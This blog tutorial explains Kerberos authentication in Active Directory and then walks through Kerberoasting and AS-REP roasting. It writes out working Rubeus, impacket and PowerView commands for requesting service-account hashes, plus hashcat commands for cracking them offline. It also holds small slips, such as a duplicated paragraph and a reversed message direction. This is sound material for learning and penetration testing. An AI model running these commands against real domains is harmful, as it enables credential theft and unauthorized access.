Skip to main content

[Backup] Kerberos

Hey friends, it is the second article in my Active Directory Theory and Exploitation series. Today, I would like to talk about Kerberos. Kerberos might be complex and daunting in many peoples’ opinion, but never mind, hopefully I can make it simple and easy to understand!

Kerberos Authentication

Let’s get familiar with some roles and keep them in mind!

Client: The end user who logs on their workstation.

KDC: The Domain Controller in the domain, it consists of Authentication Server (AS), and Ticket Granting Server (TGS). To make it simple, we regard both of them as KDC.

Service/Resource: The service or resource the end user wanna access after authentication, such as MSSQL instance, CIFS, IIS Web Server, etc.

Step 1: AS-REQ

Direction: Client -> KDC

Action: Request TGT (Ticket Granting Ticket)

Provided: Timestamp encrypted with user’s hash, while the hash is generated by user’s account and password.

Details: When the end user logs on, AS-REQ request will be sent to KDC (AS).

Step 2: AS-REP

Direction: KDC-> Client

Action: Return TGT

Provided: Session key which is encrypted by user’s password hash. And TGT which contains multiple information such as user information, domain, timestamp, session key, client ip address.

Details: KDC (AS) decrypts the timestamp, the authentication is successful. AS-REP is returned to the client.

Comment: TGT is valid for 10 hours by default, it is encrypted with krbtgt’s hash.

Step 3: TGS-REQ

Direction: Client -> KDC

Action: Request TGS ticket (Ticket Granting Service Ticket)

Provided: Client usernameSPN of the service, TGT, and the timestamp which is encrypted with the session key.

Details: When the client access domain services such as MSSQL instance, CIFS, IIS Web server, etc., TGS-REQ will be sent to KDC (TGS).

Step 4: TGS-REP

Direction: Client -> KDC

Action: Return TGS ticket

Provided: Encrypted target SPN, and the session key between client and service with previous session key in step 2. Encrypted TGS ticket which contains user info with service’s password hash

Details: KDC verifies that the target SPN, client’s TGT, user info, etc. are valid. Then KDC (TGS) returns TGS-REP.

Step 5: AP-REQ

Direction: Client -> Service

Action: Request Service Access

Provided: Client usernametimestamp encrypted with the session key between the client and service, TGS ticket encrypted with service’s password hash.

Details: The client sends AP-REQ to Service server.

Step 6: AQ-REP

Direction: Service-> Client

Action: Grant Service Access to Client

Provided: None

Details: Service server decrypts TGS ticket, and retrieve session key to decrypt client username. If it is valid, the service server check if the client has enough permission. For example, user Alice is a member of group “Server Admin”, while group “Server Admin” has local admin privilege to server SRV1. If so, the access is granted.

Here is the figure to explain detailed each step (ref: https://en.wikipedia.org/wiki/Kerberos_(protocol)#User_Client-based_Login_without_Kerberos)

Simplify The Process

Client Authentication

Step 1: Client requests TGT to KDC (AS)

Step 2: KDC (AS) returns TGT to the client.

Client Authorization

Step 3: Client requests TGS ticket to KDC (TGS)

Step 4: KDC (TGS) returns TGS ticket to the client

Access Request

Step 5: Client requests access to the service server

Step 6: As long as the client has permission, the access is granted

Classic Kerberos Exploitation

If a service runs on a domain computer under the context of a domain user account, it is a service account, and it should have SPN set. SPN is a unique identifier of a service instance. krbtgt always has SPN set, but it is not exploitable.

According to previous mentioned Kerberos authentication flow, we can find that service account’s password hash is used to encrypt TGS ticket. So Kerberoasting is a technique to retrieve krb5tgs hash by requesting TGS ticket for target service account. After that, we can crack krb5tgs hash offline, and hopefully we can get plaintext password.

Provided: Encrypted target SPN, and the session key between client and service with previous session key in step 2. Encrypted TGS ticket which contains user info with service’s password hash

Attack

On Windows

Search: Get-NetUser -SPN (PowerView.ps1)

Exploit: rubeus.exe kerberoast /format:hashcat /user:[service account] /nowrap

On Linux

Exploit: python3 GetUserSPNs.py -request -request-user [target user] -dc-ip [dc ip] [domain fqdn/user:password] (impacket)

Crack Hash: hashcat -a 0 -m 13100 krb5tgs.txt rockyou.txt

ASREPRoasting Attack

If a domain user does not require Kerberos Pre-Authentication, we are able to request AS-REP for the user and retrieve krb5asrep hash from part of the reply. Hopefully we can crack the hash and get plaintext password.

Attack

On Windows

Search: Get-NetUser -PreAuthNotRequired (PowerView.ps1)

Exploit: rubeus.exe asreproast /format:hashcat /user:[target user] /nowrap

On Linux

Exploit: python3 getNPUsers.py -dc-ip [dc ip] [domain fqdn] -userfile [user list] -format hashcat (impacket)

Crack Hash: hashcat -a 0 -m 18200 krb5asrep.txt rockyou.txt

Kerberos Delegation

Since it is a complex topic, we will talk it in details in next article.

Thanks for reading! If any update or correction is required, I will directly edit it. Happy hacking!